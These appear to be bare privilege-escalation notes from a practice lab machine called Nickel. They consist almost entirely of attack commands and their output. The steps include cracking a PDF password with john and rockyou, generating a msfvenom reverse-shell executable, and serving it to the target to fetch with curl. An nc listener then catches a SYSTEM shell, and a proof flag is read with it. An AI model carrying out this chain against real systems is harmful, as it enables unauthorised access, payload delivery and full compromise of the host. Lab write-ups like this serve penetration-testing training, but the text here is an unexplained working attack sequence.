Priv Esc

NowiseSloopTheory139
PS C:\Users\ariah> ls C:\


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         9/1/2020  12:38 PM                ftp
d-----         9/1/2020  12:04 PM                PerfLogs
d-r---        4/14/2022   5:22 AM                Program Files
d-r---        4/14/2022   4:43 AM                Program Files (x86)
d-r---         9/1/2020  12:38 PM                Users
d-----        4/14/2022   5:23 AM                Windows
-a----        8/28/2024   5:40 PM           2693 output.txt


PS C:\Users\ariah> ls C:\ftp\


    Directory: C:\ftp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         9/1/2020  11:02 AM          46235 Infrastructure.pdf
PS C:\Users\ariah> copy C:\ftp\Infrastructure.pdf .
$ scp [email protected]:Infrastructure.pdf .
$ pdf2john Infrastructure.pdf > pdf.hash
$ john pdf.hash --wordlist=~/rockyou.txt 
ariah4168
$ curl http://192.168.241.99/?whoami
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.233 LPORT=1337 -f exe -o shell.exe  
$ python -m http.server 80
$ nc -lnvp 1337
ariah@NICKEL C:\ProgramData>curl 192.168.45.233/shell.exe -o shell.exe
$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.233] from (UNKNOWN) [192.168.241.99] 49766
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname && whoami.exe && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
hostname && whoami.exe && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
nickel
nt authority\system
9614154844e05f926e2f501e88fcc495

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.241.99
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.241.254

C:\Windows\system32>
